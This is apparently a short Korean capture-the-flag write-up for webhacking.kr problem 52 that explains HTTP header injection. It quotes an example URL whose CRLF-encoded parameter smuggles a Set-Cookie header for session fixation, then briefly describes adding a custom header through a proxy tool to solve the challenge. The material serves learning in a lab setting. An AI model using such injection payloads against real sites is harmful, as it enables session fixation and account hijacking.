webhacking.kr 52번

문제 첫 화면

일단 HEADER INJECTION에 대해서 알아 보도록하자.

http://inj.example.org/redirect.asp?origin=foo

HTTP/1.1 302 Object moved
Date: Mon, 07 Mar 2016 17:42:46 GMT
Location: account.asp?origin=foo
Connection: close
Content-Length: 121

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>

http://inj.example.org/redirect.asp?origin=foo%0d%0aSet-Cookie:%20ASPSESSIONIDACCBBTCD=SessionFixed%0d%0a

HTTP/1.1 302 Object moved
Connection: close
Location: account.asp?origin=foo
Set-Cookie: ASPSESSIONID=SessionFixed
Content-Length: 121

출처: https://www.gracefulsecurity.com/http-header-injection/

파라미터로 foo가 들어면서 \r\n을 이용해서 개행을 시키고

그 다음 Herder속성을 추가하면서 값을 넣는다.

본 문제는 clear이란 Herder속성을 추가하고 그에 따른 값을 id로 넣으면 되니까

프록시 툴을 이용하여 다음과 같이 작성한다.

성공